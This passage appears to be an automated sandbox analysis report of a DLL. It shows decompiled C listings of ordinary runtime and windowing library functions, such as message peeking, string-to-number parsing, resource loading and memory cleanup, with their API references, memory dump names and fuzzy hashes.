0x10011657
0x10011659
0x1001165c
0x1001165e
0x10011662
0x10011662
0x1001165e
0x10011657
0x10011667
0x1001166f
0x10011677
0x1001167f
0x10011687
0x00000000

APIs

__msize.LIBCMT ref: 100116B1
__msize.LIBCMT ref: 100116D4
_malloc.LIBCMT ref: 100116EC
_malloc.LIBCMT ref: 10011701

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
Instruction ID: f1eca33ff59634d1dad84df821d0f84545a75b9cee29ec0de7196f6c68877e4a
Opcode Fuzzy Hash: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
Instruction Fuzzy Hash: F1218F346047019BDB58EF74D881ADA77F6EF45291B11852AF8198F296DB30ECD1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001EB9E Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001EB9E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1001FBC4(E10034B90, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1000EC55(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1000E519();
						}
						L17:
						return E1001FC9C(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1000E519();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

0x1001eb9e
0x1001eb9e
0x1001eba5
0x1001ebb0
0x1001ebb6
0x1001ebc3
0x1001ebc6
0x1001ec2b
0x1001ec2b
0x1001ec2e
0x1001ec50
0x1001ec56
0x1001ec58
0x1001ec62
0x1001ec62
0x1001ec65
0x1001ec65
0x1001ec6c
0x1001ec6e
0x1001ec71
0x1001ec72
0x1001ec72
0x1001ec7a
0x1001ec7f
0x1001ec7f
0x1001ec30
0x1001ec30
0x1001ec34
0x1001ec37
0x1001ec39
0x1001ec3c
0x1001ec3d
0x1001ec3d
0x1001ec42
0x1001ec44
0x00000000
0x1001ec44
0x1001ebcb
0x00000000
0x00000000
0x1001ebd2
0x1001ebda
0x00000000
0x1001ebe1
0x1001ebe7
0x1001ebee
0x1001ec01
0x1001ec05
0x1001ec18
0x1001ec23
0x1001ec26
0x00000000
0x1001ec26

APIs

__EH_prolog3.LIBCMT ref: 1001EBA5
PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1001EBFF
PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1001EC16
PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1001EC50

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
Instruction ID: 7a5ad787edd883707f1bdef7fe17baf98f592d1ae8ded73e135a3cc4ce0c4401
Opcode Fuzzy Hash: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
Instruction Fuzzy Hash: 98314B75A0068AEFDB20DFA4CD95EAE73E8FF04744F110919F652AA181D770EE818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001338A Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E1001338A(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x10045580; // 0xe155dca3
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E100235A2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E100235A2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E100234D2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E100233E3();
						} else {
							_t23 = E100233BA();
						}
						L17:
						return E1001FBB5(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

0x1001338a
0x1001338a
0x10013393
0x1001339a
0x100133a0
0x100133a3
0x100133a8
0x100133ae
0x100133af
0x100133b2
0x100133b7
0x100133ca
0x100133cb
0x100133cd
0x100133d3
0x100133ee
0x100133e3
0x100133e9
0x100133e9
0x100133f3
0x100133f7
0x10013400
0x10013400
0x10013406
0x1001340e
0x1001340f
0x10013410
0x10013412
0x10013412
0x10013416
0x100133bf
0x100133bf
0x00000000
0x10013418
0x1001341c
0x10013424
0x10013426
0x10013427
0x10013430
0x10013429
0x10013429
0x10013429
0x10013438
0x10013444
0x10013444
0x10013416
0x100133bb
0x100133bd
0x100133bd
0x00000000

APIs

CharNextA.USER32(?), ref: 100133E1

Part of subcall function 100235A2: __ismbcspace_l.LIBCMT ref: 100235A8

CharNextA.USER32(00000000), ref: 100133FE
_strtol.LIBCMT ref: 10013429
_strtoul.LIBCMT ref: 10013430

Part of subcall function 100233E3: strtoxl.LIBCMT ref: 10023403

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
Instruction ID: f08684c254250480d72764a4ddbea2980768ff31fde62085fc420af539802239
Opcode Fuzzy Hash: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
Instruction Fuzzy Hash: 132124725002959BCB11DB758C81BAAB7E8EF49240F9180A6F991DB041DB70EE848B65

Uniqueness

Uniqueness Score: -1.00%

Function 1001829A Relevance: 6.1, APIs: 4, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1001829A(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E10018237( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

0x1001829e
0x100182a3
0x10018347
0x10018347
0x100182aa
0x100182b2
0x100182c6
0x100182c9
0x1001831f
0x10018325
0x10018325
0x10018328
0x1001832d
0x1001833e
0x1001833e
0x00000000
0x10018344
0x100182cb
0x100182cc
0x1001830f
0x1001830f
0x10018313
0x00000000
0x00000000
0x10018318
0x00000000
0x10018318
0x100182ce
0x100182d1
0x10018307
0x00000000
0x10018307
0x100182d3
0x100182d4
0x00000000
0x100182d6
0x100182d6
0x100182d9
0x100182e1
0x100182e6
0x100182eb
0x100182f4
0x100182f7
0x100182fc
0x10018301
0x10018301
0x100182fc
0x100182eb
0x00000000
0x100182d9
0x100182d4
0x100182b4
0x100182b8
0x00000000
0x100182ba
0x100182bb
0x00000000
0x100182bb

APIs

SafeArrayDestroy.OLEAUT32 ref: 100182BB
CoTaskMemFree.OLE32(?), ref: 1001833E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
Instruction ID: c02b11928bb34d0169e99c27a309c5edd31e5ee767437d52a490cee524480b39
Opcode Fuzzy Hash: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
Instruction Fuzzy Hash: 831149306006169FDB95DF65D888BAE77E9EF05A82B594428F866DE190CB35DF80CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016E59 Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E10016E59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E1001FBC4(E100341C0, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038988;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E1000EC55(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E10010284(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E1000E519();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038068;
						E100102E5(_t64 - 0x1c);
						return E1001FC9C(_t55);
					}
					_push(_t60);
					E10015A21( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E1000E519();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}

0x10016e59
0x10016e59
0x10016e60
0x10016e65
0x10016e67
0x10016e6a
0x10016e71
0x10016e7a
0x10016e7d
0x10016e80
0x10016e88
0x10016e8c
0x10016eca
0x10016ed2
0x10016edb
0x10016ef0
0x10016efe
0x10016f04
0x10016f06
0x10016f09
0x10016e91
0x10016e95
0x10016e9b
0x10016e9e
0x10016ea0
0x10016ea2
0x10016ea5
0x10016ea6
0x10016ea6
0x10016eab
0x10016ead
0x10016ead
0x10016eb4
0x10016ebb
0x10016ec7
0x10016ec7
0x10016f14
0x10016f15
0x10016f1a
0x10016f1d
0x10016f20
0x10016f22
0x10016f25
0x10016f26
0x10016f26
0x00000000
0x10016f20
0x10016e8e
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10016E60
GetRgnBox.GDI32(?,?), ref: 10016EDB
IntersectRect.USER32 ref: 10016EF0
EqualRect.USER32 ref: 10016EFE

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
Instruction ID: 9e2c62e01a377e36abd0cffc80b86d38f34e6c8c4516d003d55709a082953a26
Opcode Fuzzy Hash: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
Instruction Fuzzy Hash: BA21027690024AEFDF02DFA4CC809AEBBB8FF08201F00855AF555AB112DB75EA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100050DA Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E100050DA(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1001FBC4(E10032EBF, __ebx, __edi, __esi);
				_t35 = E10004D4A(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E100050A8(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E100209E8( &_a4, 0x1003e34c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10004EB7(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x100050da
0x100050da
0x100050da
0x100050da
0x100050da
0x100050e1
0x100050ee
0x100050f0
0x100050f3
0x100050f7
0x100050fa
0x100050fc
0x100050fc
0x10005101
0x10005104
0x10005108
0x1000510b
0x10005117
0x1000511c
0x1000511e
0x10005120
0x10005123
0x10005128
0x1000512a
0x1000512a
0x10005148
0x1000515e
0x10005169
0x10005171
0x10005171
0x1000514a
0x1000514d
0x1000514f
0x1000514f
0x10005174

APIs

__EH_prolog3.LIBCMT ref: 100050E1

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

__CxxThrowException@8.LIBCMT ref: 10005117
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,1000103F,00000000,00000000,?,?,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10005140

Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7

LocalFree.KERNEL32(1000103F,1000103F,8007000E,100010E9), ref: 10005169

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
Instruction ID: 9a825a0554ffdf54c91d77e2f252a4914c60dad5953363715cdae4c7005f82be
Opcode Fuzzy Hash: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
Instruction Fuzzy Hash: E0117071604249BFEB01DFA4CC81AAF7BA9FF08391F118529F629CB291D7329E50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10007DCD Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10007DCD(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000EC09(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x10007dd0
0x10007dd1
0x10007dd4
0x10007dd6
0x10007ddd
0x10007de0
0x10007de3
0x10007dea
0x10007e01
0x10007e01
0x10007e08
0x10007e13
0x10007e13
0x10007e17
0x10007e1a
0x10007e22
0x10007e24
0x10007e33
0x10007e37
0x10007e26
0x10007e26
0x10007e29
0x10007e2d
0x10007e2d
0x10007e40
0x10007e4c
0x10007e4c
0x10007e40
0x10007e52
0x10007e57
0x10007e57
0x10007e63

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 10007DF3
LoadResource.KERNEL32(?,00000000), ref: 10007DFB
LockResource.KERNEL32(00000000), ref: 10007E0D
FreeResource.KERNEL32(00000000), ref: 10007E57

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
Instruction ID: 3dc56c73a436512b808f722c38b75c0ae418026c2f8f50a1f0547d44829b82b9
Opcode Fuzzy Hash: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
Instruction Fuzzy Hash: B3119D70902B95EFE710DF61CC88AABB3B8FF08395B218499E84653555E3B8AD40D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 10006279 Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10006279(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1001FBC4(E10032FC2, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E10006D2B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1003701c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E10021041( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000EC09(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E10004E6E(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E10005EE5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
